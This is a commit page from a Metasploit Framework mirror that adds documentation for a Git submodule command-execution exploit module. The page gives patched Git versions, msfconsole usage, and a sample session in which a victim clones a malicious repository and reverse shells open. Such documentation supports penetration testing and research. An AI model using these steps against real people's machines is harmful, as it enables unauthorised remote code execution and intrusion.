infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

add docs for the git submodule vulnerability

bug/bundler_fix
Tim 2017-08-29 16:58:18 +08:00
parent 39299c0fb8
commit 5631ddc246
1 changed files with 62 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

62
documentation/modules/exploit/multi/http/git_submodule_exec.md Normal file
View File

@ -0,0 +1,62 @@
## Vulnerable Application
Git can be installed on a variety of operating systems, however
newer versions may contain the patch for this vulnerability.
On OSX it can be installed with the XCode command line tools:
```xcode-select --install```
On Linux it can be installed with apt:
```sudo apt-get update && sudo apt-get install git```
You can check the version with ```git --version```.
The fix is included in the following version:
2.7.6, 2.8.6, 2.9.5, 2.10.4, 2.11.3, 2.12.4, 2.13.5, 2.14.1
## Verification Steps
Example steps in this format:
1. Install the application
1. Start msfconsole
1. Do: ```use exploit/multi/http/git_submodule_command_exec```
1. Do: ```set SRVHOST [local host]```
1. Do: ```set LHOST [local host]```
1. Do: ```exploit```
1. Clone the malicous Git URI and its submodules
1. You should get a shell
## Options
**GIT_URI**
This is the URI the git repository will be hosted from (defaults to random).
**GIT_SUBMODULE**
This is the URI of the submodule within the git repository (defaults to random).
The url of this submodule, when cloned, will execute the payload.
## Scenarios
Example usage against a macOS Sierra x64 bit target running git version 2.10.1
```
msf > use exploit/multi/http/git_submodule_command_exec
msf exploit(git_submodule_command_exec) > set SRVHOST 192.168.0.1
SRVHOST => 192.168.0.1
msf exploit(git_submodule_command_exec) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(git_submodule_command_exec) > exploit
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.0.1:4444
msf exploit(git_submodule_command_exec) > [*] Using URL: http://192.168.0.1:8080/D29MF1UC
[*] Server started.
[*] Malicious Git URI is http://192.168.0.1:8080/ldnwrixuqq.git
***
Victim executes: git clone http://192.168.0.1:8080/ldnwrixuqq.git --recurse-submodules
***
[*] Command shell session 1 opened (192.168.0.1:4444 -> 192.168.0.1:55151) at 2017-08-29 16:54:56 +0800
[*] Command shell session 2 opened (192.168.0.1:4444 -> 192.168.0.1:55152) at 2017-08-29 16:54:56 +0800
```